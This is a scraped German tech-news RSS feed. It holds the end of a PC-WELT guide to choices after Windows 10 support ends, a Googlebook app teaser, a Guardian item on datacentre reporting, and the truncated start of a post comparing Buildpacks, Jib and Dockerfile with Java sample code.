</p><p>Das HP OmniBook X Flip vereint Leistung und Flexibilität: Der AMD Ryzen AI Prozessor mit dedizierter NPU liefert bis zu 50 TOPS KI-Leistung. Das 14 Zoll 2K-Touchdisplay (16:9) überzeugt mit scharfen Bildern, das Scharnier ermöglicht vier Nutzungsmodi. Dank Schnellladefunktion ist der Akku in 30 Minuten zu 50 % geladen – ideal für lange Arbeitstage unterwegs.</p>
</div><div class="clear-both"></div><div class="more_btn"><a href="https://www.amazon.de/HP-OmniBook-dedizierte-1920x1200-Touchscreen/dp/B0DYKVHN9S/ref=sr_1_3?__mk_de_DE=%C3%85M%C3%85%C5%BD%C3%95%C3%91&amp;crid=17T5EFAKLON23&amp;dib=eyJ2IjoiMSJ9.Urord4CgBJNJbYPPq1-tmQ.BfmMNE5BiLmKOdYlUYty3j3H7aTBSwU3lNWwIw7fq0g&amp;dib_tag=se&amp;keywords=B0DYKVHN9S&amp;qid=1783079697&amp;sprefix=b0dykvhn9s%2Caps%2C164&amp;sr=8-3&amp;th=1&amp;tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" class="promotion-view-deal-link" rel="noopener">Erfahren Sie mehr über das HP OmniBook X Flip</a></div></div>



<p>Bei besonders schwerwiegenden Sicherheitslücken sind aber weiterhin Ausnahmen möglich. Denn Microsoft hatte auch schon bei älteren, eingestellten Versionen wie Windows XP und Windows 7 in seltenen Fällen noch Patches nach Supportende veröffentlicht. Doch darauf dürfen Sie sich nicht verlassen.</p>



<p>Sie stehen also spätestens am 13. Oktober nächsten Jahres vor der Entscheidung, ob Sie Ihren Windows-10-Rechner noch weiternutzen wollen. Diese Möglichkeiten haben Sie:</p>



<h2 class="wp-block-heading toc">Upgrade auf Windows 11: Sicher, gratis, empfehlenswert</h2>



<p><strong>Für diese Zielgruppe: </strong>Ihr alter PC/Laptop läuft stabil und ist für Ihre Bedürfnisse ausreichend schnell. Sie wollen möglichst kein Geld ausgeben und trotzdem relativ sicher vor Hackern und Viren sein. Zudem möchten Sie ein aktuelles Betriebssystem nutzen.</p>



<p>Der einfachste Weg besteht darin, dass Sie Ihr Windows 10 auf Windows 11 upgraden. <a href="https://support.microsoft.com/de-de/windows/upgrade-auf-windows-11-faq-fb6206a2-1a0f-448a-80f1-8668ee5b2bf9">Das ist für Sie kostenlos.</a> Einzige Hürde: <a href="https://www.pcwelt.de/article/1196400/windows-11-hardware-voraussetzungen-und-pruef-tool.html" target="_blank" rel="noreferrer noopener">Ihre Hardware muss für Windows 11 geeignet sein. </a>Das bedeutet: TPM 2.0, Secure Boot und kompatible Prozessoren ab der 8. Intel-Generation oder vergleichbare AMD-Modelle sind in Ihrem Rechner vorhanden.</p>



<p>Microsoft stellt die kostenlose <a href="https://go.microsoft.com/fwlink/?linkid=2169346" target="_blank" rel="noreferrer noopener">PC-Integritätsprüfungs-App</a> zur Verfügung, <a href="https://www.pcwelt.de/article/1198609/pc-health-check-ist-zurueck-microsoft-tool-prueft-ob-ihr-pc-fit-fuer-windows-11-ist.html" target="_blank" rel="noreferrer noopener">mit der Sie unter Windows 10 testen können,</a> ob die Aktualisierung möglich ist. Klicken Sie dazu nach dem Start des Tools auf „Jetzt überprüfen“.</p>



<p><strong>Tipp</strong>: Mit einigen Tricks können Sie Windows 11 auch auf Rechnern installieren, die für Windows 11 wegen veralteter Hardware nicht geeignet sind.</p>



<p><strong>Lösung:</strong> Wir erklären beide Upgrade-Wege – also für kompatible und für nichtkompatible Windows-10-Rechner – in dem Ratgeber “<a href="https://www.pcwelt.de/article//windows-10-update-auf-windows-11-24h2-so-gehts-kosten.html" target="_blank" rel="noreferrer noopener">Windows-10-Update auf Windows 11 24H2: Wie gehts? Was kostet es?</a>“.</p>



<p>Zur Installation auf Hardware, die eigentlich nicht für Windows 10 geeignet ist, können Sie zudem “<a href="https://www.pcwelt.de/article/1199049/windows-11-auf-jeder-hardware-installieren-so-gehts.html" target="_blank" rel="noreferrer noopener">Windows 11 auf jeder Hardware installieren – so geht´s</a>” lesen. Einen umfassenden Überblick zur Upgrade-Thematik bietet zudem unser Ratgeber “<a href="https://www.pcwelt.de/article/2915366/windows-10-nutzer-aufgepasst-das-muessen-sie-jetzt-unbedingt-tun.html" target="_blank" rel="noreferrer noopener">Windows-10-Nutzer aufgepasst: Das müssen Sie jetzt tun</a>“.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h2 class="wp-block-heading toc">Neuen Windows-11-Rechner kaufen: Sicher, teuer, empfehlenswert</h2>



<p><strong>Für diese Zielgruppe: </strong>Ihr alter PC/Laptop hat bereits Macken, stürzt ab oder ist zu langsam. Sie benötigen ohnehin neue Hardware. </p>



<p>In diesem Fall ist der Kauf eines neuen Rechners oder Laptops ganz klar die beste Wahl für Sie. Damit machen Sie nichts falsch, allerdings müssen Sie dafür Geld in die Hand nehmen.</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3003041/die-besten-mini-pcs-im-test-fur-buro-streaming-gaming-und-server.html" target="_blank" rel="noreferrer noopener">Die besten Mini-PCs im Test – für Büro, Streaming, Gaming und Server</a></li>



<li><a href="https://b2c-contenthub.com/wp-admin/post.php?post=3143670&amp;action=edit">Die besten Mini-PCs bis 800 Euro im Test: Viel Leistung auf kleinstem Raum</a></li>



<li><a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Die besten Notebooks aller Klassen im Vergleich</a></li>



<li><a href="https://www.pcwelt.de/article/1207305/das-sind-die-besten-pcs-fuer-buero-und-home-office.html" target="_blank" rel="noreferrer noopener">Das sind die besten PCs fürs Büro und Homeoffice</a></li>
</ul>



<h2 class="wp-block-heading toc">Wechsel zu Linux: Sicher, kostenlos, aufwendig</h2>



<p><strong>Für diese Zielgruppe: </strong>Ihr alter PC/Laptop läuft stabil und ist für Ihre Bedürfnisse ausreichend schnell. Sie wollen möglichst kein Geld ausgeben und trotzdem relativ sicher vor Hackern und Viren sein. Und Sie benötigen Windows nicht zwingend für bestimmte Anwendungen oder Spiele.</p>



<p>Sie müssen sich in das neue Betriebssystem allerdings einarbeiten und neue Programme kennenlernen. Das kostet Zeit und vermutlich auch etwas Nerven. Der Lohn der Mühe: Sie sind endlich frei von Microsoft. So, wie es unser Kollege in “<a href="https://www.pcwelt.de/article/2651727/endlich-frei-von-windows-nie-mehr-microsoft-dank-diesem-tool.html" target="_blank" rel="noreferrer noopener">Nie mehr Windows: Dieses Tool macht Sie jetzt Microsoft-frei</a>” beschreibt.</p>



<p><strong>Lösung</strong>: In “<a href="https://www.pcwelt.de/article/2521785/linux-wie-windows-welche-distribution-ist-am-aehnlichsten.html" target="_blank" rel="noreferrer noopener">Linux wie Windows: Welche Distribution ist am ähnlichsten?</a>” stellen wir Ihnen zudem geeignete Linux-Distributionen vor. Außerdem empfehlen wir Ihnen den Artikel “<a href="https://www.pcwelt.de/article/1178186/linux-anfaenger.html" target="_blank" rel="noreferrer noopener">Linux für Windows-Umsteiger: 10 Fragen &amp; Antworten</a>“.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading toc">Wechsel zu einem Mac: Sicher, teuer, aufwendig</h2>



<p><strong>Für diese Zielgruppe: </strong>Ihr alter PC/Laptop hat bereits Macken, stürzt ab oder ist zu langsam. Sie benötigen ohnehin neue Hardware und sind bereit, viel Geld auszugeben und sich in ein neues Betriebssystem einzuarbeiten.</p>



<p><strong>Lösung</strong>: iMacs und Macbooks sind leistungsfähig und sicher, bekommen lange Updates und sind langlebig. Sie sind aber auch teuer, wobei das Macbook Neo jetzt einen vergleichsweise preiswerten Einstieg ermöglicht, siehe “<a href="https://www.pcwelt.de/article/3079069/das-macbook-neo-fuer-700-euro-ist-microsofts-schlimmster-albtraum.html" target="_blank" rel="noreferrer noopener">Das Macbook Neo für 700 Euro ist Microsofts schlimmster Albtraum</a>“.</p>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://amazon.de/dp/B0GR6PN6BH?tag=pcwelt.de-21&amp;ascsubtag=4-0-2286220-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-2286220-7-0-0-0-0">Macbook Neo bei Amazon anschauen</a></div>


<h2 class="wp-block-heading toc">Wechsel zu einem Chromebook oder Googlebook: Sicher, günstig, bedingt empfehlenswert</h2>



<p><strong>Für diese Zielgruppe: </strong>Ihre alte Hardware läuft nicht mehr rund und Sie benötigen einen Laptop nur für wenig rechenintensive Aufgaben wie Surfen, Social Media, Streaming oder Office-Arbeiten. Sie wollen wenig Geld ausgeben und vergleichsweise sicher unterwegs sein. Sie arbeiten ohnehin immer schon durchgehend online.</p>



<p><strong>Lösung</strong>: In diesem Fall müssen Sie Ihren alten Windows-10-Laptop nicht zwingend durch ein teures Windows-11-Notebook oder ein Macbook ersetzen. Sondern können stattdessen auch ein vergleichsweise preiswertes Chromebook kaufen. Oder künftig ein Googlebook.</p>



<p>Chromebooks eignen sich als günstige Notebooks gut für alltägliche Aufgaben und Büroarbeiten. Dabei müssen Sie ganz auf das Ökosystem von Google vertrauen, im Gegenzug bekommen Sie <a href="https://www.pcwelt.de/article/2616240/darum-sind-chromebooks-sicherer-als-andere-laptops.html" target="_blank" rel="noreferrer noopener">viel Sicherheit vor Schadsoftware</a>. Hier finden Sie passende Geräte: <a href="https://www.pcwelt.de/article/2505538/die-besten-chromebooks-test.html" target="_blank" rel="noreferrer noopener">Die besten Chromebooks im Test.</a></p>



<p>Die Googlebooks sind die neueste Laptop-Familie von Google. Standardmäßig mit Gemini Intelligence und dem Magic Pointer an Bord. In “<a href="https://www.pcwelt.de/article/3138293/mit-den-googlebooks-will-google-den-laptop-markt-aufmischen-das-steckt-dahinter.html" target="_blank" rel="noreferrer noopener">Mit den Googlebooks will Google den Laptop-Markt aufmischen: Das steckt dahinter</a>” stellen wir Ihnen diese Geräte vor. Als Betriebssystem dient hier genauso wie bei den Chromebooks Chrome OS. Verkaufsstart soll im Herbst 2026 sein. Preise nennt Google noch keine, ebenso fehlen alle Informationen zur Hardware.</p>



<h2 class="wp-block-heading">Die letzte Chance</h2>



<p>Was aber tun, wenn man kein Geld für einen neuen Rechner hat, der alte PC aber das Upgrade auf Windows 11 wegen seiner schwachen Hardware nicht zulässt? Nun, dann bleibt theoretisch die Möglichkeit, Windows 10 weiter zu verwenden.</p>



<h2 class="wp-block-heading toc">Windows 10 nach Oktober 2027 weiternutzen: Nicht empfehlenswert</h2>



<p><strong>Für diese Zielgruppe: </strong>Ihr alter PC/Laptop läuft stabil und ist für Ihre Bedürfnisse ausreichend schnell. Sie wollen oder können kein Geld ausgeben und/oder benötigen weiter Windows 10 für bestimmte Anwendungen oder Spiele. Oder Sie wollen sich nicht mehr an ein neues Betriebssystem gewöhnen.</p>



<p><strong>Lösung: Beachten Sie die folgenden Hinweise</strong></p>



<p><strong>Virenscanner und Anwendungen aktuell halten</strong></p>



<p>Einen Windows-10-Rechner nach dem 12.10.2027 mit dem Internet zu verbinden, ist sehr gefährlich. Falls Sie das doch tun wollen und sich der Gefahr bewusst sind, dann halten Sie unbedingt den <a href="https://www.pcwelt.de/article/1203258/die-beste-antiviren-software-fuer-windows-10-fuers-buero.html">Virenscanner</a> und die Firewall auf dem PC immer aktuell. Aktualisieren Sie zudem immer alle Anwendungen auf dem Rechner, also beispielsweise die Browser.</p>



<p><strong>Defender bleibt aktuell</strong></p>



<p>Immerhin: Die vorhandenen Sicherheitsfunktionen des Betriebssystems bleiben aktiv, das gilt auch für den Malwareschutz. Sie veralten aber mit zunehmender Dauer. Der in Windows integrierte Microsoft Defender Antivirus wird aber weiterhin aktualisiert. Microsoft stellt hierfür die sogenannten „Security Intelligence Updates“ (die Datenbanken zur Erkennung neuer Viren und Malware) für alle Windows 10-Nutzer mindestens bis Oktober 2028 bereit. Dies garantiert einen grundlegenden und aktuellen Schutz vor Schadsoftware, auch wenn das Betriebssystem selbst nicht mehr gegen Schwachstellen im Code gepatcht wird.</p>



<p><strong>Meiden Sie unbekannte Webseiten und Downloads</strong></p>



<p>Die Firewall Ihres Routers schützt Ihren Windows-10-Rechner auch weiterhin. Gefährlich wird es aber, wenn Sie Webseiten im Browser aufrufen. Vermeiden Sie deshalb unbedingt den Besuch unbekannter Webseiten. Klicken Sie keine unbekannten Links an und seien Sie besonders vorsichtig bei Downloads – das gilt auch für Links und Dateianhänge in Mails. </p>



<p><strong>Kein Online-Banking</strong></p>



<p>Vermeiden Sie Einkäufe, Bezahlvorgänge und Online-Banking auf diesem Rechner. </p>



<p><strong>2FA besonders wichtig</strong></p>



<p>Schützen Sie alle Ihre Benutzerkonten durch die <a href="https://www.pcwelt.de/article/1206889/zwei-faktor-authentifizierung-alles-was-sie-wissen-muessen.html" target="_blank" rel="noreferrer noopener">Zweifaktorauthentifizierung</a> oder durch <a href="https://www.pcwelt.de/article/3128548/hoeren-sie-auf-passwoerter-zu-verwenden-ersetzen-sie-diese-stattdessen-jetzt-mit-passkeys.html" target="_blank" rel="noreferrer noopener">Passkeys</a>. Melden Sie sich bei all Ihren wichtigen Websites mit einem zusätzlichen Code (oder Schlüssel/Passwort) an, den Sie auf Ihrem Smartphone und nicht auf Ihrem jetzt anfälligen Windows-Computer speichern. Auf diese Weise können Malware oder Hacker Ihre Konten nicht über Ihren Computer übernehmen.</p>



<p><strong>Vom Internet trennen</strong></p>



<p>Falls Sie Ihren Windows-10-Rechner nach Oktober 2027 weiter nutzen wollen, um darauf beispielsweise ein fest installiertes Spiel zu spielen, für das Sie keine Internetverbindung benötigen, dann trennen Sie den Rechner am besten dauerhaft vom Internet. Und stecken Sie nur solche externen Datenträger wie USB-Sticks oder Festplatten an, die Sie mit einem aktuellen Virenscanner überprüft haben.</p>



<p>Weitere Ratschläge für die Weiternutzung von Windows 10 lesen Sie in “<a href="https://www.pcwelt.de/article/2620354/ab-heute-bekommt-windows-10-keine-sicherheits-updates-mehr-das-muessen-sie-jetzt-tun.html" target="_blank" rel="noreferrer noopener">Ab heute bekommt Windows 10 keine Sicherheits-Updates mehr – das müssen Sie jetzt tun</a>“. In diesem Zusammenhang sollten Sie auch die <a href="https://www.pcwelt.de/article/2872603/windows-10-support-ende-diese-datei-unbedingt-jetzt-runterladen.html" target="_blank" rel="noreferrer noopener">Windows-10-ISO-Datei herunterladen.</a></p>



<h2 class="wp-block-heading toc">Nutzen Sie Windows 10 in einer virtuellen Maschine: Sicher und gratis</h2>



<p>Falls Sie Windows 10 nur gelegentlich und nur für bestimmte Zwecke benötigen, können Sie das Betriebssystem auch in einer <a href="https://www.pcwelt.de/article/1179269/glossar-fachbegriffe-rund-um-virtuelle-pcs.html" target="_blank" rel="noreferrer noopener">virtuellen Maschine </a>installieren. Auf Ihrem Rechner läuft dann beispielsweise das aktuelle Windows 11 und Windows 10 starten Sie, wenn Sie es benötigen, als Gastsystem in der virtuellen Maschine.</p>



<h2 class="wp-block-heading toc">Updates für Windows 10 bis 2023: Sonderweg</h2>



<p>Eine Alternative, die Sie bereits jetzt nutzen können, ist die <a href="https://www.pcwelt.de/article/2431390/windows-10-bekommt-ab-oktober-2025-keine-updates-0patch-aendert-das.html" target="_blank" rel="noreferrer noopener">Sicherheitslösung 0Patch</a>. Dabei handelt es sich um ein Unternehmen, das Sicherheitsupdates für Windows 10 bis zum Jahr 2030 bereitstellt. Allerdings aktualisiert die cloudbasierte Software des Unternehmens nicht die Systemdateien von Windows 10, sondern aktiviert die Patches im Arbeitsspeicher des Rechners. Dadurch müssen diese bei jedem Start neu geladen werden. </p>



<p>Der Einstieg in die Software ist sogar kostenlos möglich. Wer umfassender geschützt sein will, <a href="https://0patch.com/pricing.html">kann die kostenpflichtige Version für 25 Euro pro Jahr zuzüglich Steuer buchen.</a></p>



<h2 class="wp-block-heading toc">Windows-10-Variante mit Updates bis 2032: Nicht legal</h2>



<p>Im Internet finden sich immer wieder Tipps, auf das Betriebssystem Windows 10 IoT Enterprise LTSC 2021 zu setzen. Dieses entspricht im Grunde genommen Windows 10 Enterprise mit allen Funktionen und erhält Updates bis 2032. <a href="https://learn.microsoft.com/de-de/windows/iot/iot-enterprise/commercialization/licensing" target="_blank" rel="noreferrer noopener">Lizenzrechtlich ist der Einsatz als Büro-PC aber nicht erlaubt</a>. </p>



<p>Technisch gesehen können Sie das Betriebssystem nach dem Kauf aber bis 2032 sicher einsetzen. Wie das geht, erklären wir in “<a href="https://www.pcwelt.de/article/2865406/windows-11-zu-windows-10-updowntool-anleitung-updates-bis-2032.html" target="_blank" rel="noreferrer noopener">Kostenlos von Windows 11 zu Windows 10 wechseln und Updates bis 2032 nutzen – so geht’s mit UpDownTool</a>“.</p>



<p><strong>Wichtig</strong>: Wie auch immer Ihre Entscheidung ausfällt, sollten Sie ein Backup Ihrer Daten auf dem alten Rechner machen. Mit <a href="https://software.pcwelt.de/offer/oo_diskimage_20_professional/43873?x-source=4-0-2620354-1-0-0-00001-0?x-source=rss" target="_blank" rel="noreferrer noopener">O&amp;O DiskImage</a> ist das kein Problem.</p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android: Neue Google App ‚Magic Pointer‘ taucht jetzt im Play Store auf – die erste App für Googlebooks]]></title>
<description><![CDATA[In diesen Tagen starten überraschend viele neue Google-Apps für Android und jetzt steht schon die nächste in den Startlöchern: Jetzt wurde die neue App Magic Pointer im Play Store entdeckt, die wenig überraschend für eine neue Geräteklasse steht. Es handelt sich um die magischen Funktionen des Ma...]]></description>
<link>https://tsecurity.de/de/3664251/it-nachrichten/android-neue-google-app-magic-pointer-taucht-jetzt-im-play-store-auf-die-erste-app-fuer-googlebooks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664251/it-nachrichten/android-neue-google-app-magic-pointer-taucht-jetzt-im-play-store-auf-die-erste-app-fuer-googlebooks/</guid>
<pubDate>Mon, 13 Jul 2026 07:17:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="359" src="https://www.googlewatchblog.de/wp-content/uploads/googlebook-magic-cursor-1024x575.jpg" class="attachment-large size-large wp-post-image" alt="googlebook magic cursor" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/googlebook-magic-cursor-1024x575.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/googlebook-magic-cursor-300x169.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/googlebook-magic-cursor-768x432.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/googlebook-magic-cursor-640x360.jpg 640w, https://www.googlewatchblog.de/wp-content/uploads/googlebook-magic-cursor-800x450.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/googlebook-magic-cursor.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>In diesen Tagen starten überraschend viele neue Google-Apps für Android und jetzt steht schon die nächste in den Startlöchern: Jetzt wurde die neue App <a href="https://www.googlewatchblog.de/2026/05/android-am-desktop-alle-infos-zum-magic-pointer-google-zeigt-neuerfindung-des-mauszeigers-videos/"><strong>Magic Pointer</strong></a> im Play Store entdeckt, die wenig überraschend für eine neue Geräteklasse steht. Es handelt sich um die magischen Funktionen des Mauszeigers für die neuen <a href="https://www.googlewatchblog.de/2026/05/googlebook-das-sind-die-neuen-google-laptops-fuer-den-android-desktop-ersetzen-die-chromebooks-galerie/"><strong>Googlebooks</strong></a>, die schon bald starten dürften.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/07/android-neue-google-app-magic-pointer-zeigt-sich-ueberraschend-im-play-store-erste-app-fuer-googlebooks/">Android: Neue Google App ‚Magic Pointer‘ taucht jetzt im Play Store auf – die erste App für Googlebooks</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/ec9c4ad07a4943c7aad28a28700bf9a5"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/ec9c4ad07a4943c7aad28a28700bf9a5" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/07/android-neue-google-app-magic-pointer-zeigt-sich-ueberraschend-im-play-store-erste-app-fuer-googlebooks/">Android: Neue Google App ‚Magic Pointer‘ taucht jetzt im Play Store auf – die erste App für Googlebooks</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘These are some of the most complex structures ever created’: how tech reporting moved into the physical world]]></title>
<description><![CDATA[The Guardian’s global tech reporting team are investigating the impact of the vast datacentres being built to power the AI revolution. We spoke to them about how their beat has become increasingly offlineJournalists often use the term “shoe-leather reporting” to refer to the on-the-ground legwork...]]></description>
<link>https://tsecurity.de/de/3663380/ai-nachrichten/these-are-some-of-the-most-complex-structures-ever-created-how-tech-reporting-moved-into-the-physical-world/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663380/ai-nachrichten/these-are-some-of-the-most-complex-structures-ever-created-how-tech-reporting-moved-into-the-physical-world/</guid>
<pubDate>Sun, 12 Jul 2026 16:03:31 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Guardian’s global tech reporting team are investigating the impact of the vast datacentres being built to power the AI revolution. We spoke to them about how their beat has become increasingly offline</p><p>Journalists often use the term “shoe-leather reporting” to refer to the on-the-ground legwork that goes into covering certain stories. As the tech industry’s focus has shifted from screen-based realities to the physical world of colossal AI datacentres and social media harms, comfortable footwear has become more essential to a tech reporter’s job.</p><p>Earlier this week, we published the Guardian’s <a href="https://ablink.email.theguardian.com/ss/c/u001.Yw_JkLMEmFuifc_XG18IRyTNtZQ7fIEMgszcCSneHEA13-uHzzNLsl3ZqJFCJlFe_55BMaCDFia1qGCi512R5Fhvf7DvBP6sg6v0uKzIIZbIqEwgSFEnUG6sx1MTCmXRNnPeUdkB-duGBX-K3zQopk_hKEF99Ym0b9ZHfi_rqjqWFduc38h4slfxLqh25a_J/4s4/3Z4BPV8_TYuqC0M517tRtA/h50/h001.BkF8KOQOtEWnDZUGiewMsqzAwhgoy7ZJFYH_F2y-lZw">latest investigation into the datacentres</a> and energy infrastructures that underpin AI – revealing that an £8.2bn AI complex in rural Scotland has misrepresented its plans to be powered entirely by on-site renewables. “Our reporting is showing that you can’t simply wave a magic wand and have a datacentre appear,” says Aisha Down, who covers AI for the Guardian and went to Scotland to investigate the story. “There are a lot of huge physical constraints and reality checks. These physical, tangible things are what makes or sinks the AI boom.”</p> <a href="https://www.theguardian.com/membership/2026/jul/12/tech-reporting-physical-world-ai-revolution-datacentres">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Buildpacks vs Jib vs Dockerfile: Comparing containerization methods]]></title>
<description><![CDATA[As developers we work on source code, but production systems don't run source, they need a runnable thing. Starting many years ago, most enterprises were using Java EE (aka J2EE) and the runnable "thing" we would deploy to production was a ".jar", ".war", or ".ear" file. Those files consisted of ...]]></description>
<link>https://tsecurity.de/de/3662836/it-security-nachrichten/buildpacks-vs-jib-vs-dockerfile-comparing-containerization-methods/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662836/it-security-nachrichten/buildpacks-vs-jib-vs-dockerfile-comparing-containerization-methods/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>As developers we work on source code, but production systems don't run source, they need a runnable thing. Starting many years ago, most enterprises were using Java EE (aka J2EE) and the runnable "thing" we would deploy to production was a ".jar", ".war", or ".ear" file. Those files consisted of the compiled Java classes and would run inside of a "container" running on the JVM. As long as your class files were compatible with the JVM and container, the app would just work.</p><p>That all worked great until people started building non-JVM stuff: Ruby, Python, NodeJS, Go, etc. Now we needed another way to package up apps so they could be run on production systems. To do this we needed some kind of virtualization layer that would allow anything to be run. Heroku was one of the first to tackle this and they used a Linux virtualization system called "lxc" - short for Linux Containers. Running a "container" on lxc was half of the puzzle because still a "container" needed to be created from source code, so Heroku invented what they called "Buildpacks" to create a standard way to convert source into a container.</p><p>A bit later a Heroku competitor named dotCloud was trying to tackle similar problems and went a different route which ultimately led to Docker, a standard way to create and run containers across platforms including Windows, Mac, Linux, Kubernetes, and Google Cloud Run. Ultimately the container specification behind Docker became a standard under the <a href="https://opencontainers.org/" target="_blank">Open Container Initiative (OCI)</a> and the virtualization layer switched from lxc to <a href="https://github.com/opencontainers/runc" target="_blank">runc</a> (also an OCI project).</p><p>The traditional way to build a Docker container is built into the <code>docker</code> tool and uses a sequence of special instructions usually in a file named <code>Dockerfile</code> to compile the source code and assemble the "layers" of a container image.</p><p>Yeah, this is confusing because we have all sorts of different "containers" and ways to run stuff in those containers. And there are also many ways to create the things that run in containers. The bit of history is important because it helps us categorize all of this into three parts:</p><ul><li>Container Builders - Turn source code into a Container Image</li><li>Container Images - Archive files containing a "runnable" application</li><li>Containers - Run Container Images</li></ul><p>With Java EE those three categories map to technologies like:</p><ul><li>Container Builders == Ant or Maven</li><li>Container Images == .jar, .war, or .ear</li><li>Containers == JBoss, WebSphere, WebLogic</li></ul><p>With Docker / OCI those three categories map to technologies like:</p><ul><li>Container Builders == Dockerfile, Buildpacks, or Jib</li><li>Container Images == .tar files usually not dealt with directly but through a "container registry"</li><li>Containers == Docker, Kubernetes, Cloud Run</li></ul><h3>Java Sample Application</h3>Let's explore the Container Builder options further on a little Java server application.  If you want to follow along, clone my <a href="https://github.com/jamesward/comparing-docker-methods" target="_blank">comparing-docker-methods project</a>:<p><code>git clone https://github.com/jamesward/comparing-docker-methods.git</code><br></p><p><code>cd comparing-docker-methods</code></p><p></p><p>In that project you'll see a basic Java web server in <code>src/main/java/com/google/WebApp.java</code> that just responds with "hello, world" on a GET request to <code>/</code>. Here is the source:<br></p><p></p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'package com.google;\r\n\r\nimport com.sun.net.httpserver.HttpServer;\r\nimport java.io.IOException;\r\nimport java.io.OutputStream;\r\nimport java.net.InetSocketAddress;\r\n\r\npublic class WebApp {\r\n\r\n  public static void main(String[] args) throws IOException {\r\n    int port = Integer.parseInt(System.getenv().getOrDefault("PORT", "8080"));\r\n    HttpServer server = HttpServer.create(new InetSocketAddress(port), 0);\r\n\r\n    server.createContext("/", handler -&gt; {\r\n      byte[] response = "hello, world".getBytes();\r\n      handler.sendResponseHeaders(200, response.length);\r\n      try (OutputStream os = handler.getResponseBody()) {\r\n        os.write(response);\r\n      }\r\n    });\r\n\r\n    System.out.println("Listening at http://localhost:" + port);\r\n\r\n    server.start();\r\n  }\r\n}'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860670&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>This project uses Maven with a minimal <code>pom.xml</code> build config file for compiling and running the Java server:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '&lt;?xml version="1.0" encoding="UTF-8"?&gt;\r\n&lt;project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\r\n    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"&gt;\r\n  &lt;modelVersion&gt;4.0.0&lt;/modelVersion&gt;\r\n\r\n  &lt;groupId&gt;com.google&lt;/groupId&gt;\r\n  &lt;artifactId&gt;sample-java-mvn&lt;/artifactId&gt;\r\n  &lt;packaging&gt;jar&lt;/packaging&gt;\r\n  &lt;version&gt;0.1.0-SNAPSHOT&lt;/version&gt;\r\n\r\n  &lt;properties&gt;\r\n    &lt;maven.compiler.source&gt;8&lt;/maven.compiler.source&gt;\r\n    &lt;maven.compiler.target&gt;8&lt;/maven.compiler.target&gt;\r\n  &lt;/properties&gt;\r\n\r\n  &lt;build&gt;\r\n    &lt;plugins&gt;\r\n      &lt;plugin&gt;\r\n        &lt;groupId&gt;org.codehaus.mojo&lt;/groupId&gt;\r\n        &lt;artifactId&gt;exec-maven-plugin&lt;/artifactId&gt;\r\n        &lt;version&gt;1.6.0&lt;/version&gt;\r\n        &lt;executions&gt;\r\n          &lt;execution&gt;\r\n            &lt;goals&gt;\r\n              &lt;goal&gt;java&lt;/goal&gt;\r\n            